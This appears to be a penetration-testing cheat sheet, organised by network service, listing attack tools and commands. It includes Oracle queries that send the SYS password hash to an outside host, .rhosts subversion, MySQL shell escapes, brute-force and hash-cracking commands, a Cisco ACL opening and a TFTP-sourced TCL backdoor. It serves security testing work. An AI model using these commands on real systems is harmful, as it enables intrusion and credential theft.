ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
*
ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
+ full-2
ldap brute force
#
bf_ldap User Link
*
bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
#
K0ldS User Link
#
LDAP_Brute.pl User Link
+ full-3
Examine Configuration Files
#
General
*
containers.ldif
*
ldap.cfg
*
ldap.conf
*
ldap.xml
*
ldap-config.xml
*
ldap-realm.xml
*
slapd.conf
#
IBM SecureWay V3 server
*
V3.sas.oc
#
Microsoft Active Directory server
*
msadClassesAttrs.ldif
#
Netscape Directory Server 4
*
nsslapd.sas_at.conf
*
nsslapd.sas_oc.conf
#
OpenLDAP directory server
*
slapd.sas_at.conf
*
slapd.sas_oc.conf
#
Sun ONE Directory Server 5.1
*
75sas.ldif
o
rlogin port 513 open
+
Rlogin Enumeration
#
Find the files
*
find / -name .rhosts
*
locate .rhosts
#
Examine Files
*
cat .rhosts
#
Manual Login
*
rlogin hostname -l username
*
rlogin
#
Subvert the files
*
echo ++ > .rhosts
+
Rlogin Brute force
#
Hydra User Link
o
rsh port 514 open
+ full-1
Rsh Enumeration
#
rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
+ full-2
Rsh Brute Force
#
rsh-grind User Link
#
Hydra User Link
#
medusa User Link
o
SQL Server Port 1433 1434 open
+ full-1
SQL Enumeration
#
piggy User Link
#
SQLPing User Link
*
sqlping ip_address/hostname
#
SQLPing2 User Link
#
SQLPing3 User Link
#
SQLpoke User Link
#
SQL Recon User Link
#
SQLver User Link
+ full-2
SQL Brute Force
#
SQLPAT User Link
*
sqlbf -u hashes.txt -d dictionary.dic -r out.rep – Dictionary Attack
*
sqlbf -u hashes.txt -c default.cm -r out.rep – Brute-Force Attack
#
SQL Dict User Link
#
SQLAT User Link
#
Hydra User Link
#
SQLlhf User Link
#
ForceSQL User Link
o
Citrix port 1494 open
+ full-1
Citrix Enumeration
#
Default Domain
#
Published Applications
*
./citrix-pa-scan {IP_address/file | – | random} [timeout] User Link
*
citrix-pa-proxy.pl IP_to_proxy_to [Local_IP] User Link
+ full-2
Citrix Brute Force
#
bforce.js User Link
#
connect.js User Link
#
Citrix Brute-forcer User Link
#
Reference Material
*
Hacking Citrix – the lame way User Link
*
Hacking Citrix – the forceful way User Link
o
Oracle Port 1521 Open
+ full-1
Oracle Enumeration
#
oracsec User Link
#
Repscan User Link
#
Sidguess User Link
#
Scuba User Link
#
DNS/HTTP Enumeration User Link
*
SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME=’SYS’)||’.vulnerabilityassessment.co.uk’) FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E=’SYS’)||’.vulnerabilityassessment.co.uk’) FROM DUAL
*
SQL> select utl_http.request(‘http://gladius:5500/’||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME=’SYS’)) from dual;
#
WinSID User Link
#
Oracle default password list User Link
#
TNSVer User Link
*
tnsver host [port]
#
TCP Scan User Link
#
Oracle TNSLSNR User Link
*
Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
#
TNSCmd User Link
*
perl tnscmd.pl -h ip_address
*
perl tnscmd.pl version -h ip_address
*
perl tnscmd.pl status -h ip_address
*
perl tnscmd.pl -h ip_address –cmdsize (40 – 200)
#
LSNrCheck User Link
#
Oracle Security Check (needs credentials) User Link
#
OAT User Link
*
sh opwg.sh -s ip_address
*
opwg.bat -s ip_address
*
sh oquery.sh -s ip_address -u username -p password -d SID OR c:oquery -s ip_address -u username -p password -d SID
#
OScanner User Link
*
sh oscanner.sh -s ip_address
*
oscanner.exe -s ip_address
*
sh reportviewer.sh oscanner_saved_file.xml
*
reportviewer.exe oscanner_saved_file.xml
#
NGS Squirrel for Oracle User Link
#
Service Register User Link
*
Service-register.exe ip_address
#
PLSQL Scanner 2008 User Link
+ full-2
Oracle Brute Force
#
OAK User Link
*
ora-getsid hostname port sid_dictionary_list
*
ora-auth-alter-session host port sid username password sql
*
ora-brutesid host port start
*
ora-pwdbrute host port sid username password-file
*
ora-userenum host port sid userlistfile
*
ora-ver -e (-f -l -a) host port
#
breakable (Targets Application Server Port) User Link
*
breakable.exe host url [port] [v]
host ip_address of the Oracle Portal Server
url PATH_INFO i.e. /pls/orasso
port TCP port Oracle Portal Server is serving pages from
v verbose
#
SQLInjector (Targets Application Server Port) User Link
*
sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
*
sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
#
Check Password User Link
#
orabf User Link
*
orabf [hash]:[username] [options]
#
thc-orakel User Link
*
Cracker
*
Client
*
Crypto
#
DBVisualisor User Link
*
Sql scripts from pentest.co.uk User Link
*
Manual sql input of previously reported vulnerabilties
+ full-3
Oracle Reference Material
#
Understanding SQL Injection User Link
#
SQL Injection walkthrough User Link
#
SQL Injection by example User Link
#
Advanced SQL Injection in Oracle databases User Link
#
Blind SQL Injection User Link
#
SQL Cheatsheets
*
http://ha.ckers.org/sqlinjection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://www.0×000000.com/?i=14
http://pentestmonkey.net/
o
NFS Port 2049 open
+ full-1
NFS Enumeration
#
showmount -e hostname/ip_address
#
mount -t nfs ip_address:/directory_found_exported /local_mount_point
+ full-2
NFS Brute Force
#
Interact with NFS share and try to add/delete
#
Exploit and Confuse Unix User Link
+ full-3
Examine Configuration Files
#
/etc/exports
#
/etc/lib/nfs/xtab
o
Compaq/HP Insight Manager Port 2301,2381open
+ full-1
HP Enumeration
#
Authentication Method
*
Host OS Authentication
*
Default Authentication
o
Default Passwords User Link
#
Wikto User Link
#
Nstealth User Link
+ full-2
HP Bruteforce
#
Hydra User Link
#
Acunetix User Link
+ full-3
Examine Configuration Files
#
path.properties
#
mx.log
#
CLIClientConfig.cfg
#
database.props
#
pg_hba.conf
#
jboss-service.xml
#
.namazurc
Arrow Link
o
MySQL port 3306 open
+
Enumeration
#
nmap -A -n -p3306
#
nmap -A -n -PN –script:ALL -p3306
#
telnet IP_Address 3306
#
use test; select * from test;
#
To check for other DB’s — show databases
+
Administration
#
MySQL Network Scanner User Link
#
MySQL GUI Tools User Link
#
mysqlshow
#
mysqlbinlog
+
Manual Checks
#
Default usernames and passwords
*
username: root password:
*
testing
o
mysql -h -u root
o
mysql -h -u root
o
mysql -h -u root@localhost
o
mysql -h
o
mysql -h -u “”@localhost
#
Configuration Files
*
Operating System
o
windows
+
config.ini
+
my.ini
#
windowsmy.ini
#
winntmy.ini
+
/mysql/data/
o
unix
+
my.cnf
#
/etc/my.cnf
#
/etc/mysql/my.cnf
#
/var/lib/mysql/my.cnf
#
~/.my.cnf
#
/etc/my.cnf
*
Command History
o
~/.mysql.history
*
Log Files
o
connections.log
o
update.log
o
common.log
*
To run many sql commands at once — mysql -u username -p < manycommands.sql
*
MySQL data directory (Location specified in my.cnf)
o
Parent dir = data directory
o
mysql
o
test
o
information_schema (Key information in MySQL)
+
Complete table list — select table_schema,table_name from tables;
+
Exact privileges — select grantee, table_schema, privilege_type FROM schema_privileges;
+
File privileges — select user,file_priv from mysql.user where user=’root’;
+
Version — select version();
+
Load a specific file — SELECT LOAD_FILE(‘FILENAME’);
*
SSL Check
o
mysql> show variables like ‘have_openssl’;
+
If there’s no rows returned at all it means the the distro itself doesn’t support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn’t started with ssl and can be easily fixed.
#
Privilege Escalation
*
Current Level of access
o
mysql>select user();
o
mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user=’OUTPUT OF select user()’;
*
Access passwords
o
mysql> use mysql
o
mysql> select user,password from user;
*
Create a new user and grant him privileges
o
mysql>create user test identified by ‘test’;
o
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by ‘mysql’ WITH GRANT OPTION;
*
Break into a shell
o
mysql> ! cat /etc/passwd
o
mysql> ! bash
+
SQL injection
#
mysql-miner.pl User Link
*
mysql-miner.pl http://target/ expected_string database
#
http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
#
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
+
References.
#
Design Weaknesses
*
MySQL running as root
*
Exposed publicly on Internet
#
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
#
http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
o
RDesktop port 3389 open
+ full-1
Rdesktop Enumeration
#
Remote Desktop Connection
+ full-2
Rdestop Bruteforce
#
TSGrinder User Link
*
tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
#
Tscrack User Link
o
Sybase Port 5000+ open
+ full-1
Sybase Enumeration
#
sybase-version ip_address from NGS
+ full-2
Sybase Vulnerability Assessment
#
Use DBVisualiser User Link
*
Sybase Security checksheet User Link
o
Copy output into excel spreadsheet
o
Evaluate mis-configured parameters
*
Manual sql input of previously reported vulnerabilties
o
Advanced SQL Injection in SQL Server User Link
o
More Advanced SQL Injection User Link
#
NGS Squirrel for Sybase User Link
o
SIP Port 5060 open
+ full-1
SIP Enumeration
#
netcat User Link
*
nc IP_Address Port
#
Sipscan User Link
#
smap User Link
*
smap IP_Address/Subnet_Mask
*
smap -o IP_Address/Subnet_Mask
*
smap -l IP_Address
+ full-2
SIP Packet Crafting etc.
#
sipsak User Link
*
Tracing paths: – sipsak -T -s sip:usernaem@domain
*
Options request:- sipsak -vv -s sip:username@domain
*
Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
#
siprogue User Link
+ full-3
SIP Vulnerability Scanning/ Brute Force
#
tftp bruteforcer User Link
*
Default dictionary file User Link
*
./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
#
VoIPaudit User Link
#
SiVuS User Link
+ full-4
Examine Configuration Files
#
SIPDefault.cnf
#
asterisk.conf
#
sip.conf
#
phone.conf
#
sip_notify.conf
#
.cfg
#
000000000000.cfg
#
phone1.cfg
#
sip.cfg etc. etc.
o
VNC port 5900^ open
+ full-1
VNC Enumeration
#
Scans
*
5900^ for direct access.
5800 for HTTP access.
+ full-2
VNC Brute Force
#
Password Attacks
*
Remote
o
Password Guess
+
vncrack User Link
o
Password Crack
+
vncrack User Link
+
Packet Capture
#
Phoss
http://www.phenoelit.de/phoss
*
Local
o
Registry Locations
+
HKEY_CURRENT_USERSoftwareORLWinVNC3
+
HKEY_USERS.DEFAULTSoftwareORLWinVNC3
o
Decryption Key
+
0×238210763578887
+ full-3
Exmine Configuration Files
#
.vnc
#
/etc/vnc/config
#
$HOME/.vnc/config
#
/etc/sysconfig/vncservers
#
/etc/vnc.conf
o
X11 port 6000^ open
+ full-1
X11 Enumeration
#
List open windows
#
Authentication Method
*
Xauth
*
Xhost
+ full-2
X11 Exploitation
#
xwd
*
xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
#
Keystrokes
*
Received
*
Transmitted
#
Screenshots
#
xhost +
+ full-3
Examine Configuration Files
#
/etc/Xn.hosts
#
/usr/lib/X11/xdm
*
Search through all files for the command “xhost +” or “/usr/bin/X11/xhost +”
#
/usr/lib/X11/xdm/xsession
#
/usr/lib/X11/xdm/xsession-remote
#
/usr/lib/X11/xdm/xsession.0
#
/usr/lib/X11/xdm/xdm-config
*
DisplayManager*authorize:on
o
Tor Port 9001, 9030 open
+
Tor Node Checker
#
Ip Pages User Link
#
Kewlio.net User Link
+
nmap NSE script
o
Jet Direct 9100 open
+
hijetta User Link
*
Password cracking
o
Rainbow crack User Link
+
ophcrack User Link
+
rainbow tables
#
rcrack c:rainbowcrack*.rt -f pwfile.txt
o
Ophcrack User Link
o
Cain & Abel User Link
o
John the Ripper User Link
+
./unshadow passwd shadow > file_to_crack
+
./john -single file_to_crack
+
./john -w=location_of_dictionary_file -rules file_to_crack
+
./john -show file_to_crack
+
./john –incremental:All file_to_crack
o
fgdump User Link
+
fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
o
pwdump6 User Link
+
pwdump [-h][-o][-u][-p] machineName
o
medusa User Link
o
LCP User Link
o
L0phtcrack (Note: – This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada
+
Domain credentials
+
Sniffing
+
pwdump import
+
sam import
o
aiocracker User Link
+
aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
*
Vulnerability Assessment – Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.
o
Manual
+
Patch Levels
+
Confirmed Vulnerabilities
#
Severe
#
High
#
Medium
#
Low
o
Automated
+
Reports
+
Vulnerabilities
#
Severe
#
High
#
Medium
#
Low
o
Tools
+ full-1
GFI User Link
+ full-2
Nessus (Linux) User Link
#
Nessus (Windows) User Link
+ full-3
NGS Typhon User Link
+ full-4
NGS Squirrel for Oracle User Link
+ full-5
NGS Squirrel for SQL User Link
+
SARA User Link
+
MatriXay User Link
+
BiDiBlah User Link
+
SSA User Link
+
Oval Interpreter User Link
+
Xscan User Link
+
Security Manager + User Link
+
Inguma User Link
o
Resources
+
Security Focus User Link
+
Microsoft Security Bulletin User Link
+
Common Vulnerabilities and Exploits (CVE) User Link
+
National Vulnerability Database (NVD) User Link
+
The Open Source Vulnerability Database (OSVDB) User Link
#
Standalone Database User Link
*
Update URL User Link
+
United States Computer Emergency Response Team (US-CERT) User Link
+
Computer Emergency Response Team User Link
+
Mozilla Security Information User Link
+
SANS User Link
+
Securiteam User Link
+
PacketStorm Security User Link
+
Security Tracker User Link
+
Secunia User Link
+
Vulnerabilities.org User Link
+
ntbugtraq User Link
+
Wireless Vulnerabilities and Exploits (WVE) User Link
o
Blogs
+
Metasploit User Link
+
Software Vulnerability Exploitation Blog User Link
+
Jeremiah Grossman Blog User Link
+
nCircle Blogs User Link
+
Fsecure Blog User Link
+
g0ne blog User Link
+
MC Blog User Link
+
Security Fix Blog User Link
+
Rise Security User Link
+
Rational Security User Link
+
pentest mokney.net User Link
+
GNUCitizen User Link
+
ha.ckers Blog User Link
+
Taosecurity Blog User Link
*
Network Backbone
o
Generic Toolset
+
Wireshark (Formerly Ethereal) User Link
#
Passive Sniffing
*
Usernames/Passwords
*
Email
o
POP3
o
SMTP
o
IMAP
*
FTP
*
HTTP
*
HTTPS
*
RDP
*
VOIP
*
Other
#
Filters
*
ip.src == ip_address
*
ip.dst == ip_address
*
tcp.dstport == port_no.
*
! ip.addr == ip_address
*
(ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
+
Cain & Abel User Link
#
Active Sniffing
*
ARP Cache Poisoning
o
Usernames/Passwords
o
Email
+
POP3
+
SMTP
+
IMAP
o
FTP
o
HTTP
o
HTTPS
o
RDP
o
VOIP
o
Other
*
DNS Poisoning
*
Routing Protocols
+
Cisco-Torch User Link
#
./cisco-torch.pl or ./cisco-torch.pl -F
+
NTP-Fingerprint User Link
#
perl ntp-fingerprint.pl -t [ip_address]
+
Yersinia User Link
+
p0f User Link
#
./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
+
Manual Check (Credentials required)
+
MAC Spoofing
#
mac address changer for windows User Link
#
macchanger User Link
*
Random Mac Address:- macchanger -r eth0
#
madmacs User Link
#
smac User Link
#
TMAC User Link
o
Bluetooth Specific Tools
+
Bluescanner User Link
+
Bluesweep User Link
+
btscanner User Link
+
Redfang User Link
+
Blueprint User Link
+
Bluesnarfer User Link
+
Bluebugger User Link
#
bluebugger [OPTIONS] -a [MODE]
+
Blueserial User Link
+
Bloover User Link
+
Bluesniff User Link
+
Resources
#
URL’s
*
BlueStumbler.org User Link
*
Bluejackq.com User Link
*
Bluejacking.com User Link
*
Bluejackers User Link
*
bluetooth-pentest User Link
*
ibluejackedyou.com User Link
*
Trifinite User Link
*
Common Vulnerabilities and Exploits (CVE)
o
Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
#
White Papers
*
Bluesnarfing User Link
+
Exploit Frameworks
#
BlueMaho User Link
*
# atshell.c by Bastian Ballmann (modified attest.c by Marcel Holtmann)
# bccmd by Marcel Holtmann
# bdaddr.c by Marcel Holtmann
# bluetracker.py by smiley
# psm_scan and rfcomm_scan from bt_audit-0.1.1 by Collin R. Mulliner
# BSS (Bluetooth Stack Smasher) v0.8 by Pierre Betouin
# btftp v0.1 by Marcel Holtmann
# btobex v0.1 by Marcel Holtmann
# greenplaque v1.5 by digitalmunition.com
# L2CAP packetgenerator by Bastian Ballmann
# redfang v2.50 by Ollie Whitehouse
# ussp-push v0.10 by Davide Libenzi
# exploits:
Bluebugger v0.1 by Martin J. Muench
bluePIMp by Kevin Finisterre
BlueZ hcidump v1.29 DoS PoC by Pierre Betouin
helomoto by Adam Laurie
hidattack v0.1 by Collin R. Mulliner
Nokia N70 l2cap packet DoS PoC Pierre Betouin
Sony-Ericsson reset display PoC by Pierre Betouin
o
Cisco Specific Testing
+
Methodology
# full-1
Scan & Fingerprint.
*
The purpose of ‘Scan & Fingerprint’ is to identify open ports on the target device and attempt to determine the exact IOS version. This then sets the plan for further attacks.
*
It Telnet is active, then password guessing attacks should be performed.
*
If SNMP is active, then community string guessing should be performed.
# full-2
Credentials Guessing.
*
If a network engineer/administrator has configured just one Cisco device with a poor password, then the whole network is open to attack. Attempting to connect with various usernames/passwords is a mandatory step to testing the level of security that the device offers.
*
Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the ‘enable’ password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the ‘enable’ password!
# full-3
Connect
*
Once you have identified the access credentials, whether that be HTTP, Telnet or SSH, then connect to the target device to identify further information.
*
If you have determined the ‘enable’ password, then full access has been achieved and you can alter the configuration files of the router.
# full-4
Check for bugs
*
To check for known bugs, vulnerabilities or security flaws with the device, a good security scanner should be used
o
The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact.
o
There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
# full-5
Further your attack
*
To further the attack into the target network, some changes need to be made to the running-config file of the target device. There are two main categories for configuration files with Cisco routers – running-config and startup-confg:
o
running-config is the currently running configuration settings. This gets loaded from the startup-config on boot. This configuration file is editable and the changes are immediate. Any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permenant connection through to the internal network.
o
startup-config is the boot up configuration file. It is this file that needs altering to maintain a permenant connection through to the internal network.
*
Once you have access to the config files, you will need enable (privileged mode) access for this, you can add an access list rule to allow your IP address into the internal network. The following ACL will allow the defined access to any internal IP address. So if the router is protecting a web server and an email server, this ACL will allow you to pass packets to those IP addresses on any port. Therefore you should be able to port scan them efficiently.
o
#> access-list 100 permit ip any
+ full-1
Scan & Fingerprint.
#
Port Scanning
*
nmap
o
To effectively scan a Cisco device, both TCP and UDP ports across the whole range must be checked.
There are a number of tools that can achieve the goal, however we will stick with nmap examples.
+
TCP scan: – This will perform a TCP scan, fingerprint, be verbose, scan ports 1-65535 against IP 10.1.1.1 and output the results in normal mode to TCP.scan.txt file. nmap -sT -O -v -p 1-65535 -oN TCP.scan.txt
+
UDP scan: – This will perform a UDP scan, be verbose, scan ports 1.65535 against IP 10.1.1.1 and output the results in normal mode to UDP.scan.txt file. nmap -sU -v -p 1-65535 -oN UDP.scan.txt
*
Other tools
o
ciscos is a scanner for discovering Cisco devices in a given CIDR network range.
+
Usage: ./ciscos [option]
o
mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
#
Fingerprinting
*
cisco-torch is a fingerprinter for Cisco routers. There are a number of different fingerprinting switches, such as SSH, telnet or HTTP e.g. The -A switch should perform all scans, however I have found it to be unreliable.
o
BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
+
List of targets contains 1 host(s) 14489:
Checking 10.1.1.175 …
Fingerprint:2552511255251325525324255253311310
Description:Cisco IOS host (tested on 2611, 2950 and Aironet 1200 AP)
Fingerprinting Successful
+
Cisco-IOS Webserver found
HTTP/1.1 401 Unauthorized
Date: Mon, 01 Mar 1993 00:34:11 GMT
Server: cisco-IOS Accept-Ranges: none
WWW-Authenticate: Basic realm=”level_15_access”
401 Unauthorized
*
nmap version scan: – Once open ports have been identified, version scanning should be performed against them. In this example, TCP ports 23 and 80 were found to be open.
o
TCP Port scan – nmap -sV -O -v -p 23,80 -oN TCP.version.txt
o
UDP Port scan – nmap -sV -O -v -p 161,162 -oN UDP.version.txt
+ full-2
Password Guessing.
#
CAT (Cisco Auditing Tool): – This tool extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.
*
./CAT -h -a password.wordlist
*
BT cisco-auditing-tool-v.1.0 # CAT -h 10.1.1.175 -a /tmp/dict.txt
Guessing passwords:
Invalid Password: 1234
Invalid Password: 2read
Invalid Password: 4changes
Password Found: telnet
#
brute-enabler is an internal enable password guesser. You require valid non-privilege mode credentials to use this tool, they can be either SSH or Telnet.
*
./enabler [-u username] -p password /password.wordlist [port]
*
BT brute-enable-v.1.0.2 # ./enabler 10.1.1.175 telnet /tmp/dict.txt
[`] OrigEquipMfr… wrong password
[`] Cisco… wrong password
[`] agent… wrong password
[`] all… wrong password
[`] possible password found: cisco
#
hydra: – hydra is a multi-functional password guessing tool. It can connect and pass guessed credentials for many protocols and services, including Cisco Telnet which may only require a password. (Make sure that you limit the threads to 4 (-t 4) as it will just overload the Telnet server!).
*
BT tmp # hydra -l “” -P password.wordlist -t 4 cisco
*
Hydra (http://www.thc.org) starting at 2007-02-26 10:54:10 [DATA] 4 tasks, 1 servers, 59 login tries (l:1/p:59),
~14 tries per task [DATA] attacking service cisco on port 23
Error: Child with pid 21671 was disconnected – retrying (1 of 1 retries)
[STATUS] attack finished for 10.1.1.175 (waiting for childs to finish)
[23][cisco] host: 10.1.1.175 login: password: telnet
+ full-2
SNMP Attacks.
#
CAT (Cisco Auditing Tool): – This tool extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.
*
./CAT -h -w SNMP.wordlist
*
BT cisco-auditing-tool-v.1.0# CAT -h 10.1.1.175 -w /tmp/snmp.txt
Checking Host: 10.1.1.175
Guessing passwords:
Invalid Password: cisco
Invalid Password: ciscos
Guessing Community Names:
Invalid Community Name: CISCO
Invalid Community Name: OrigEquipMfr
Community Name Found: Cisco
#
onesixtyone is a reliable SNMP community string guesser. Once it identifies the correct community string, it will display accurate fingerprinting information.
*
onesixytone -c SNMP.wordlist
*
BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS ™ C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS ™ C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
#
snmpwalk: – snmpwalk is part of the SNMP toolkit. After a valid community string is identified, you should use snmpwalk to ‘walk’ the SNMP Management Information Base (MIB) for further information. Ensure that you get the correct version of SNMP protocol in use or it will not work correctly. It may be a good idea to redirect the output to a text file for easier viewing as the tool outputs a large amount of text.
*
snmapwalk -v -c
*
BT# snmpwalk -v 1 -c enable 10.1.1.1
SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System Software IOS ™ C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.9.1.185 DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (363099) 1:00:30.99 SNMPv2-MIB::sysContact.0 = STRING: SNMPv2-MIB::sysName.0 = STRING: router SNMPv2-MIB::sysLocation.0 = STRING: SNMPv2-MIB::sysServices.0 = INTEGER: 78 SNMPv2-MIB::sysORLastChange.0 = Timeticks: (0) 0:00:00.00 IF-MIB::ifNumber.0 = INTEGER: 4
+ full-3
Connecting.
#
Telnet
*
The telnet service on Cisco devices can authenticate users based upon a password in the config file or against a RADIUS or TACACS server. If the device is simply using a VTY configuration for Telnet access, then it is likely that only a password is required to log on. If the device is passing authentication details to a RADIUS or TACACS server, then a combination of username and password will be required.
o
telnet
o
Sample Banners
+
VTY configuration:
BT / # telnet 10.1.1.175
Trying 10.1.1.175…
Connected to 10.1.1.175.
Escape character is ‘^]’.
User Access Verification
Password:
router>
+
External authentication server:
BT / # telnet 10.1.1.175
Trying 10.1.1.175…
Connected to 10.1.1.175.
Escape character is ‘^]’.
User Access Verification
Username: admin
Password:
router>
#
SSH
#
Web Browser
*
HTTP/HTTPS: – Web based access can be achieved via a simple web browser, as long as the HTTP adminstration service is active on the target device:
o
This uses a combination of username and password to authenticate. After browsing to the target device, an “Authentication Required” box will pop up with text similar to the following:
o
Authentication Required Enter username and password for “level_15_access” at http://10.1.1.1 User Name: Password:
o
Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
+
Cisco Systems Accessing Cisco 2610 “router”
#
Show diagnostic log – display the diagnostic log.
#
Monitor the router – HTML access to the command line interface at level 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
#
Show tech-support – display information commonly needed by tech support.
#
Extended Ping – Send extended ping commands.
#
VPN Device Manager (VDM) – Configure and monitor Virtual Private Networks (VPNs) through the web interface.
#
TFTP
*
Trivial File Transfer Protocol is used to back up the config files of the router. Should an attacker discover the enable password or RW SNMP community string, the config files are easy to retrieve.
o
Cain & Abel -Cisco Configuration Download/Upload (CCDU) With this tool the RW community string and the version of SNMP in use and running-config file can be downloaded to your local system.
o
ios-w3-vuln exploits the HTTP Access Bug to ‘fetch’ the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
*
There are ways of extracting the config files directy from the router even if the names have changed, however you are really limited by the speed of the TFTP server to dictionary based attacks. Cisco-torch is one of the tools that will do this. It will attempt to retrieve config files listed in the brutefile.txt file:
o
./cisco-torch.pl
o
./cisco-torch.pl -F
o
Creating backdoors in Cisco IOS using TCL User Link
+
en
router
source tftp tftp:///tclshell_ios.tcl
+
telnet 
ort
+
tclshell User Link
+ full-4
Known Bugs.
#
Attack Tools
*
Cisco Global Exploiter (CGE-13): – CGE is an attempt to combine all of the Cisco attacks into one tool.
o
perl cge.pl
+
[1] – Cisco 677/678 Telnet Buffer Overflow Vulnerability
+
[2] – Cisco IOS Router Denial of Service Vulnerability
+
[3] – Cisco IOS HTTP Auth Vulnerability
+
[4] – Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
+
[5] – Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
+
[6] – Cisco 675 Web Administration Denial of Service Vulnerability
+
[7] – Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
+
[8] – Cisco IOS Software HTTP Request Denial of Service Vulnerability
+
[9] – Cisco 514 UDP Flood Denial of Service Vulnerability
+
[10] – CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
+
[11] – Cisco Catalyst Memory Leak Vulnerability
+
[12] – Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
+
[13] – 0 Encoding IDS Bypass Vulnerability (UTF)
+
[14] – Cisco IOS HTTP Denial of Service Vulnerability
*
HTTP Arbitrary Access vulnerability: – A common security flaw (of its time!) was/is the HTTP Arbitrary Access vulnerability. This flaw allowed an external attacker to execute router commands via the web interface. Cisco devices have a number of privilege levels, these levels start at 0 (User EXEC) and go up to 100, although mostly only the first 15 are used. Level 15 is Privileged EXEC mode, the same as enable mode. By referring to these levels within the URL of the target device, an attacker could pass commands to the router and have them execute in Privilege EXEC mode.
o
Web browse to the Cisco device: http://
o
Click cancel to the logon box and enter the following address:
+
http:///level/99/exec/show/config (You may have to scroll through all of the levels from 16-99 for this to work.)
o
To raise the logging level to only log emergencies:
+
